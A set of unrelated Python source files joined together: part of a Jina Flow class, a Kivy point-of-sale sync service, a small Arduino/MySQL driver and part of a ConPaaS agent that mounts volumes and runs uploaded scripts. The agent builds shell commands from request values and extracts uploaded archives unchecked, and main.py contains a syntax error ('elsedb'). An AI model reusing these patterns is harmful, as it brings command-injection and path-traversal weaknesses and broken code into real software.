mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='deployment_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, gateway connection can be better showed
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
# no need to deep copy if the Graph is built because no change will be made to the Flow
op_flow = (
copy.deepcopy(self)
if (copy_flow and self._build_level.value == FlowBuildLevel.EMPTY)
else self
)
if build and op_flow._build_level.value == FlowBuildLevel.EMPTY:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import Image, display
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
print(f'[link={url}]Click here to see the visualization in browser[/]')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as URL points to a SVG. It needs internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url points to a SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self._deployment_nodes[GATEWAY_NAME].port
else:
return self._common_kwargs.get('port', None)
@port.setter
def port(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port = self._common_kwargs['port']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self._deployment_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def monitoring(self) -> bool:
"""Return if the monitoring is enabled
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self[GATEWAY_NAME].args.monitoring
else:
return False
@property
def port_monitoring(self) -> int:
"""Return if the monitoring is enabled
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._deployment_nodes:
return self[GATEWAY_NAME].args.port_monitoring
else:
return self._common_kwargs.get(
'port_monitoring', __default_port_monitoring__
)
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._deployment_nodes.items().__iter__()
def _init_table(self):
table = Table(title=None, box=None, highlight=True, show_header=False)
table.add_column('', justify='right')
table.add_column('', justify='right')
table.add_column('', justify='right')
table.add_column('', justify='right')
return table
def _get_address_table(self, address_table):
address_table.add_row(':link:', 'Protocol', f'{self.protocol}')
address_table.add_row(
':house:',
'Local access',
f'[link={self.protocol}://{self.host}:{self.port}]{self.host}:{self.port}[/]',
)
address_table.add_row(
':lock:',
'Private network',
f'[link={self.protocol}://{self.address_private}:{self.port}]{self.address_private}:{self.port}[/]',
)
if self.address_public:
address_table.add_row(
':earth_africa:',
'Public address',
f'[link={self.protocol}://{self.address_public}:{self.port}]{self.address_public}:{self.port}[/]',
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.add_row(
':speech_balloon:',
'Swagger UI',
f'[link=http://localhost:{self.port}/docs]http://localhost:{self.port}/docs[/]',
)
address_table.add_row(
':books:',
'Redoc',
f'[link=http://localhost:{self.port}/redoc]http://localhost:{self.port}/redoc[/]',
)
if self.gateway_args.expose_graphql_endpoint:
address_table.add_row(
':strawberry:',
'GraphQL UI',
f'[link=http://localhost:{self.port}/graphql]http://localhost:{self.port}/graphql[/]',
)
if self.monitoring:
address_table.add_row(
':bar_chart:',
'Prometheus',
f'[link=http://localhost:{self.port_monitoring}]http://localhost:{self.port_monitoring}[/]',
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that onces set will resume the control Flow
to main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow, can only be set before the Flow has been started
:param value: the protocol to set
"""
# Flow is running already, protocol cant be changed anymore
if self._build_level >= FlowBuildLevel.RUNNING:
raise RuntimeError('Protocol can not be changed after the Flow has started')
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
def __getitem__(self, item):
if isinstance(item, str):
return self._deployment_nodes[item]
elif isinstance(item, int):
return list(self._deployment_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
if self.args.workspace is not None:
return os.path.abspath(self.args.workspace)
else:
return None
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all deployments
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
p.update_pod_args()
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Deployments' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Deployments' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'pod_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "pod_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all deployments.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
v.update_pod_args()
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def to_k8s_yaml(
self,
output_base_path: str,
k8s_namespace: Optional[str] = None,
include_gateway: bool = True,
):
"""
Converts the Flow into a set of yaml deployments to deploy in Kubernetes.
If you don't want to rebuild image on Jina Hub,
you can set `JINA_HUB_NO_IMAGE_REBUILD` environment variable.
:param output_base_path: The base path where to dump all the yaml files
:param k8s_namespace: The name of the k8s namespace to set for the configurations. If None, the name of the Flow will be used.
:param include_gateway: Defines if the gateway deployment should be included, defaults to True
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
from jina.orchestrate.deployments.config.k8s import K8sDeploymentConfig
k8s_namespace = k8s_namespace or self.args.name or 'default'
for node, v in self._deployment_nodes.items():
if v.external or (node == 'gateway' and not include_gateway):
continue
if node == 'gateway' and v.args.default_port:
from jina.serve.networking import GrpcConnectionPool
v.args.port = GrpcConnectionPool.K8S_PORT
v.first_pod_args.port = GrpcConnectionPool.K8S_PORT
v.args.default_port = False
deployment_base = os.path.join(output_base_path, node)
k8s_deployment = K8sDeploymentConfig(
args=v.args,
k8s_namespace=k8s_namespace,
k8s_deployments_addresses=self._get_k8s_deployments_addresses(
k8s_namespace
)
if node == 'gateway'
else None,
)
configs = k8s_deployment.to_k8s_yaml()
for name, k8s_objects in configs:
filename = os.path.join(deployment_base, f'{name}.yml')
os.makedirs(deployment_base, exist_ok=True)
with open(filename, 'w+') as fp:
for i, k8s_object in enumerate(k8s_objects):
yaml.dump(k8s_object, fp)
if i < len(k8s_objects) - 1:
fp.write('---\n')
print(
f'K8s yaml files have been created under [b]{output_base_path}[/]. You can use it by running [b]kubectl apply -R -f {output_base_path}[/]'
)
def to_docker_compose_yaml(
self,
output_path: Optional[str] = None,
network_name: Optional[str] = None,
include_gateway: bool = True,
):
"""
Converts the Flow into a yaml file to run with `docker-compose up`
:param output_path: The output path for the yaml file
:param network_name: The name of the network that will be used by the deployment name
:param include_gateway: Defines if the gateway deployment should be included, defaults to True
"""
import yaml
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
output_path = output_path or 'docker-compose.yml'
network_name = network_name or 'jina-network'
from jina.orchestrate.deployments.config.docker_compose import (
DockerComposeConfig,
)
docker_compose_dict = {
'version': '3.3',
'networks': {network_name: {'driver': 'bridge'}},
}
services = {}
for node, v in self._deployment_nodes.items():
if v.external or (node == 'gateway' and not include_gateway):
continue
docker_compose_deployment = DockerComposeConfig(
args=v.args,
deployments_addresses=self._get_docker_compose_deployments_addresses(),
)
service_configs = docker_compose_deployment.to_docker_compose_config()
for service_name, service in service_configs:
service['networks'] = [network_name]
services[service_name] = service
docker_compose_dict['services'] = services
with open(output_path, 'w+') as fp:
yaml.dump(docker_compose_dict, fp, sort_keys=False)
command = (
'docker-compose up'
if output_path is None
else f'docker-compose -f {output_path} up'
)
print(
f'Docker compose file has been created under [b]{output_path}[/b]. You can use it by running [b]{command}[/b]'
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
main.py
|
# -*- coding: utf-8 -*-
# @Author: Manuel Rodriguez <valle>
# @Date: 01-Mar-2018
# @Email: valle.mrv@gmail.com
# @Last modified by: valle
# @Last modified time: 13-Mar-2018
# @License: Apache license vesion 2.0
import os
import sys
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(ROOT_DIR)
sys.path.insert(0, os.path.join(ROOT_DIR, "valle_libs"))
sys.path.insert(0, os.path.join(ROOT_DIR, "tpv"))
from time import sleep
from kivy.lib import osc
from valle_libs.valleorm.qson import *
from models.db import *
from datetime import datetime, timedelta
from kivy.storage.jsonstore import JsonStore
from kivy.core import Logger
from config import config
import websocket
import threading
import time
import json
url_db = os.path.join("../db", "sync.json")
db = JsonStore(url_db)
finalizar = False
stop = threading.Event()
if not os.path.isfile("run.block"):
f = open("run.block", "w")
f.close()
class SyncVentasSender(QSonSender):
db_name = "ventas"
#url = config.URL_SERVER+"/simpleapi/"
url = "http://localhost:8000/simpleapi/"
def save_date_db(**args):
global db
text_hora_pedidos = args["pedidos"] if "pedidos" in args else db.get("db")["pedidos"]
text_hora_lineas = args["lineas"] if "lineas" in args else db.get("db")["lineas"]
text_hora_clientes =args["clientes"] if "clientes" in args else db.get("db")["clientes"]
text_hora_dir = args["dir"] if "dir" in args elsedb.get("db")["dir"]
db.put("db", pedidos=text_hora_pedidos, lineas=text_hora_lineas,
clientes=text_hora_clientes, dir=text_hora_dir)
def on_success(obj, result):
if result["success"] == True:
if "add" in result:
text_hora_get = db.get("db")["date_get"]
db.put("db", date=str(datetime.now()), date_get=text_hora_get)
if "arqueos" in result["add"]:
borrar_reg()
if "get" in result:
text_hora = db.get("db")["date"]
db.put("db", date_get=str(datetime.now()), date=text_hora)
for s in result["get"]["pedidos"]:
p = Pedidos(**s)
p.estado = p.estado + "_SN"
p.save()
for c in s["clientes"]:
cliente = Clientes(**c)
cliente.save()
for d in c["direcciones"]:
direccion = Direcciones(**d)
direccion.save()
for l in s["lineaspedido"]:
linea = LineasPedido(**l)
linea.save()
p.lineaspedido_set.add(linea)
def sync_pedidos_send(**condition):
ps = Pedidos.filter(**condition)
qsons = []
for p in ps:
p.estado = p.estado + "_SN"
qson = QSon("Pedidos", reg=p.toDICT())
qsons.append(qson)
for l in p.lineaspedido_set.get():
qson_child = QSon("LineasPedido", reg=l.toDICT())
qson.append_child(qson_child)
for c in p.clientes_set.get():
qson_child = QSon("Clientes", reg=c.toDICT())
qson.append_child(qson_child)
for d in c.direcciones_set.get():
qson_dir = QSon("Direcciones", reg=d.toDICT())
qson_child.append_child(qson_dir)
qsonsender = SyncVentasSender()
if len(qsons) > 0:
qsonsender.save(*qsons)
return qsonsender
def sync_arqueos_send(**condition):
ps = Arqueos.filter()
qsons = []
for p in ps:
qson = QSon("Arqueos", reg=p.toDICT())
qsons.append(qson)
for l in p.conteo.get():
qson_child = QSon("Conteo", reg=l.toDICT())
qson.append_child(qson_child)
for c in p.gastos.get():
qson_child = QSon("Gastos", reg=c.toDICT())
qson.append_child(qson_child)
for d in p.pedidosextra.get():
qson_dir = QSon("PedidosExtra", reg=d.toDICT())
qson.append_child(qson_dir)
for d in p.pedidos.get():
qson_dir = QSon("Pedidos", reg=d.toDICT())
qson.append_child(qson_dir)
if len(qsons) > 0:
qsonsender = SyncVentasSender()
qsonsender.save(*qsons)
qsonsender.send_data(on_success)
def sync_clientes_send(**condition):
clientes = Clientes.filter(**condition)
qsons = []
for c in clientes:
qson = QSon("Clientes", reg=c.toDICT())
qsons.append(qson)
for d in c.direcciones_set.get():
qson_dir = QSon("Direcciones", reg=d.toDICT())
qson.append_child(qson_dir)
if len(qsons) > 0:
qsonsender = SyncVentasSender()
qsonsender.save(*qsons)
qsonsender.send_data(on_success)
def borrar_reg():
for p in Arqueos.filter():
p.delete()
for d in Pedidos.filter():
d.delete()
for p in PedidosExtra.filter():
p.delete()
for p in Conteo.filter():
p.delete()
for p in Gastos.filter():
p.delete()
def thread_load():
global db
while True:
try:
if stop.is_set():
if os.path.isfile("run.block"):
os.unlink("run.block")
return
if "db" in db:
text_hora_pedidos = db.get("db")["pedidos"]
text_hora_lineas = db.get("db")["lineas"]
text_hora_clientes = db.get("db")["clientes"]
text_hora_dir = db.get("db")["dir"]
else:
text_hora_pedidos = str(datetime.now()-timedelta(hours=12))
text_hora_lineas = str(datetime.now()-timedelta(hours=12))
text_hora_clientes = str(datetime.now()-timedelta(hours=12))
text_hora_dir = str(datetime.now()-timedelta(hours=12))
save_date_db(pedidos=text_hora_pedidos,
lineas=text_hora_pedidos, clientes=text_hora_pedidos,
dir=text_hora_pedidos,)
'''
#Envio los pedidos modificados en el tpv
#query = "modify > '%s'" % text_hora
#qsonsender = sync_pedidos_send(query=query + "AND estado NOT LIKE '%_SN%'")
#Envio la peticion de pedidos modificados fuera del tpv
qsonsender = QSonSender()
qsons = []
qson = QSon("Pedidos", modify__gt=text_hora)
qson.add_exclude(estado="AR_")
qsons.append(qson)
qsons.append(QSon("LineasPedido"))
qsons.append(QSon("Clientes"))
qsons.append(QSon("Direcciones"))
qsonsender.filter(*qsons)
qsonsender.send_data(on_success)
'''
sleep(1)
except Exception as e:
Logger.error("[ERROR ] %s" %e)
sleep(1)
def sync_service(message, *args):
global finalizar
if message[2] == "finalizar":
finalizar = True
elif message[2] == "sync":
qsonsender = QSonSender()
qsonsender.send(on_success, message[3])
elif message[2] == "sync_arqueo":
sync_arqueos_send()
Logger.debug("got a message! %s" % message[2])
if __name__ == '__main__':
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ROOT_DIR = os.path.dirname(BASE_DIR)
osc.init()
oscid = osc.listen(ipAddr='127.0.0.1', port=config.PORT_SERVICE)
osc.bind(oscid, sync_service, '/sync_service')
thread = threading.Thread(target=thread_load)
thread.start()
while not finalizar:
osc.readQueue(oscid)
sleep(.1)
stop.set()
|
serverDriver.py
|
import threading
import arduinoConnection
import mysqlSetup
import time
if __name__ == "__main__":
# Run setup once
mysqlSetup.mysqlinitsetup()
# creating thread
t1 = threading.Thread(target=arduinoConnection.arduinoEngine)
t1.daemon = True
t1.start()
# keep daemon threads alive
while True:
time.sleep(1)
|
agent.py
|
"""
Copyright (c) 2010-2015, Contrail consortium.
All rights reserved.
Redistribution and use in source and binary forms,
with or without modification, are permitted provided
that the following conditions are met:
1. Redistributions of source code must retain the
above copyright notice, this list of conditions
and the following disclaimer.
2. Redistributions in binary form must reproduce
the above copyright notice, this list of
conditions and the following disclaimer in the
documentation and/or other materials provided
with the distribution.
3. Neither the name of the Contrail consortium nor the
names of its contributors may be used to endorse
or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
import re
import os
import time
import signal
from threading import Thread
from subprocess import Popen, PIPE
from os.path import exists, devnull, join, lexists
from shutil import rmtree
import pickle
import zipfile
import tarfile
import tempfile
import simplejson
from conpaas.core.expose import expose
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse,\
FileUploadField
from conpaas.core.agent import BaseAgent, AgentException
from conpaas.core import git
from conpaas.core.misc import run_cmd
from conpaas.core.misc import check_arguments, is_in_list, is_not_in_list,\
is_list, is_non_empty_list, is_list_dict, is_list_dict2, is_string,\
is_int, is_pos_nul_int, is_pos_int, is_dict, is_dict2, is_bool,\
is_uploaded_file
class GenericAgent(BaseAgent):
def __init__(self, config_parser, **kwargs):
"""Initialize Generic Agent.
'config_parser' represents the agent config file.
**kwargs holds anything that can't be sent in config_parser.
"""
BaseAgent.__init__(self, config_parser)
self.SERVICE_ID = config_parser.get('agent', 'SERVICE_ID')
self.GENERIC_DIR = config_parser.get('agent', 'CONPAAS_HOME')
self.VAR_CACHE = config_parser.get('agent', 'VAR_CACHE')
self.CODE_DIR = join(self.VAR_CACHE, 'bin')
self.VOLUME_DIR = '/media'
self.env = {}
self.processes = {}
@expose('POST')
def init_agent(self, kwargs):
"""Set the environment variables"""
exp_params = [('agents_info', is_string),
('ip', is_string)]
try:
agents_info, agent_ip = check_arguments(exp_params, kwargs)
agents_info = simplejson.loads(agents_info)
except Exception as ex:
return HttpErrorResponse("%s" % ex)
self.logger.info('Setting agent environment')
target_dir = self.VAR_CACHE
with open(join(target_dir, 'agents.json'), 'w') as outfile:
simplejson.dump(agents_info, outfile)
agent_role = [i['role'] for i in agents_info if i['ip'] == agent_ip][0]
master_ip = [i['ip'] for i in agents_info if i['role'] == 'master'][0]
self.env.update({'MY_IP':agent_ip})
self.env.update({'MY_ROLE':agent_role})
self.env.update({'MASTER_IP':master_ip})
self.logger.info('Agent initialized')
return HttpJsonResponse()
@expose('UPLOAD')
def update_code(self, kwargs):
valid_filetypes = [ 'zip', 'tar', 'git' ]
exp_params = [('filetype', is_in_list(valid_filetypes)),
('codeVersionId', is_string),
('file', is_uploaded_file, None),
('revision', is_string, '')]
try:
filetype, codeVersionId, file, revision = check_arguments(exp_params, kwargs)
if filetype != 'git' and not file:
raise Exception("The '%s' filetype requires an uploaded file" % filetype)
elif filetype == 'git' and not revision:
raise Exception("The 'git' filetype requires the 'revision' parameter")
except Exception as ex:
return HttpErrorResponse("%s" % ex)
self.logger.info("Updating code to version '%s'" % codeVersionId)
if filetype == 'zip':
source = zipfile.ZipFile(file.file, 'r')
elif filetype == 'tar':
source = tarfile.open(fileobj=file.file)
elif filetype == 'git':
source = git.DEFAULT_CODE_REPO
# kill all scripts that may still be running
if self.processes:
self._kill_all_processes()
self.processes = {}
target_dir = self.CODE_DIR
if exists(target_dir):
rmtree(target_dir)
if filetype == 'git':
subdir = str(self.SERVICE_ID)
self.logger.debug("git_enable_revision('%s', '%s', '%s', '%s')" %
(target_dir, source, revision, subdir))
git.git_enable_revision(target_dir, source, revision, subdir)
else:
source.extractall(target_dir)
self.logger.info("Code updated, executing the 'init' command")
# every time a new code tarball is activated, execute the init.sh script
self._execute_script('init')
return HttpJsonResponse()
def check_volume_name(self, vol_name):
if not re.compile('^[A-za-z0-9-_]+$').match(vol_name):
raise Exception('Volume name contains invalid characters')
@expose('POST')
def mount_volume(self, kwargs):
"""Mount a volume to a Generic node."""
exp_params = [('dev_name', is_string),
('vol_name', is_string)]
try:
dev_name, vol_name = check_arguments(exp_params, kwargs)
dev_name = "/dev/%s" % dev_name
self.check_volume_name(vol_name)
except Exception as ex:
return HttpErrorResponse("%s" % ex)
self.logger.info("Mount operation starting up for volume '%s' on '%s'"
% (vol_name, dev_name))
try:
mount_point = join(self.VOLUME_DIR, vol_name)
self._mount(dev_name, mount_point, True)
except Exception as e:
self.logger.exception("Failed to mount volume '%s'" % vol_name)
return HttpErrorResponse('Failed to mount volume: ' + e.message)
self.logger.info('Mount operation completed')
return HttpJsonResponse()
def _check_dev_is_attached(self, dev_name):
# if the device file does not exist, the volume is definitely not
# attached yet
if not lexists(dev_name):
return False
# force the kernel to re-read the partition table
# this allows reusing the device name after a volume was detached
run_cmd('sfdisk -R %s' % dev_name)
# check if the device appears in the partitions list
short_dev_name = dev_name.split('/')[2]
output, _ = run_cmd('cat /proc/partitions')
return short_dev_name in output
def _mount(self, dev_name, mount_point, mkfs):
devnull_fd = open(devnull, 'w')
# waiting for our block device to be available
dev_found = False
dev_prefix = dev_name.split('/')[2][:-1]
for attempt in range(1, 11):
self.logger.info("Generic node waiting for block device '%s'" % dev_name)
if self._check_dev_is_attached(dev_name):
dev_found = True
break
else:
# On EC2 the device name gets changed
# from /dev/sd[a-z] to /dev/xvd[a-z]
if self._check_dev_is_attached(dev_name.replace(dev_prefix, 'xvd')):
dev_found = True
dev_name = dev_name.replace(dev_prefix, 'xvd')
self.logger.info("Block device is renamed to '%s'" % dev_name)
break
time.sleep(10)
# create mount point
mkdir_cmd = "mkdir -p %s" % mount_point
run_cmd(mkdir_cmd)
if dev_found:
self.logger.info("Generic node has now access to '%s'" % dev_name)
# prepare block device
if mkfs:
self.logger.info("Creating new file system on '%s'" % dev_name)
prepare_args = ['mkfs.ext4', '-q', '-m0', dev_name]
proc = Popen(prepare_args, stdin=PIPE, stdout=devnull_fd,
stderr=devnull_fd, close_fds=True)
proc.communicate(input="y") # answer interactive question with y
if proc.wait() != 0:
self.logger.critical('Failed to prepare storage device:(code=%d)' %
proc.returncode)
else:
self.logger.info('File system created successfully')
else:
self.logger.info(
"Not creating a new file system on '%s'" % dev_name)
time.sleep(10)
# mount
mount_args = ['mount', dev_name, mount_point]
mount_cmd = ' '.join(mount_args)
self.logger.debug("Running command '%s'" % mount_cmd)
_, err = run_cmd(mount_cmd)
if err:
self.logger.critical('Failed to mount storage device: %s' % err)
else:
self.logger.info("Generic node has prepared and mounted '%s'"
% mount_point)
else:
self.logger.critical("Block device '%s' unavailable" % dev_name)
@expose('POST')
def unmount_volume(self, kwargs):
"""Unmount a volume to a Generic node."""
exp_params = [('vol_name', is_string)]
try:
vol_name = check_arguments(exp_params, kwargs)
self.check_volume_name(vol_name)
except Exception as ex:
return HttpErrorResponse("%s" % ex)
self.logger.info("Unmount operation starting up for volume '%s'"
% vol_name)
try:
self._unmount(vol_name)
except Exception as e:
self.logger.exception("Failed to unmount volume '%s'" % vol_name)
return HttpErrorResponse('Failed to unmount volume: ' + e.message)
self.logger.info('Unmount operation completed')
return HttpJsonResponse()
def _unmount(self, vol_name):
mount_point = join(self.VOLUME_DIR, vol_name)
# kill all processes still using the volume
fuser_args = ['fuser', '-km', mount_point]
fuser_cmd = ' '.join(fuser_args)
self.logger.debug("Running command '%s'" % fuser_cmd)
run_cmd(fuser_cmd)
# unmount
unmount_args = ['umount', mount_point]
unmount_cmd = ' '.join(unmount_args)
self.logger.debug("Running command '%s'" % unmount_cmd)
_, err = run_cmd(unmount_cmd)
if err:
self.logger.critical('Failed to unmount storage device: %s' % err)
else:
self.logger.info("Generic node has succesfully unmounted '%s'"
% mount_point)
@expose('POST')
def execute_script(self, kwargs):
valid_commands = [ 'notify', 'run', 'interrupt', 'cleanup' ]
exp_params = [('command', is_in_list(valid_commands)),
('parameters', is_string, ''),
('agents_info', is_string)]
try:
command, parameters, agents_info = check_arguments(exp_params, kwargs)
agents_info = simplejson.loads(agents_info)
except Exception as ex:
return HttpErrorResponse("%s" % ex)
if command == 'notify':
self.logger.info("Executing the '%s' command" % command)
else:
self.logger.info("Executing the '%s' command with parameters '%s'"
% (command, parameters))
target_dir = self.VAR_CACHE
with open(join(target_dir, 'agents.json'), 'w') as outfile:
simplejson.dump(agents_info, outfile)
if command == 'interrupt':
# if no script is running, do nothing
if not self._are_scripts_running():
self.logger.info("No scripts are currently running")
# if interrupt is already running, kill all processes
elif self._get_script_status('interrupt') == 'RUNNING':
self.logger.info("Script 'interrupt.sh' is already running")
self._kill_all_processes()
# execute the script and afterwards kill all processes
else:
Thread(target=self._do_interrupt, args=[parameters]).start()
else:
# if scripts are already running, do nothing
if self._are_scripts_running():
self.logger.info("Scripts are already running")
# execute the script
else:
self._execute_script(command, parameters)
return HttpJsonResponse()
def _do_interrupt(self, parameters):
# execute interrupt.sh
self._execute_script('interrupt', parameters)
# wait for it to finish execution
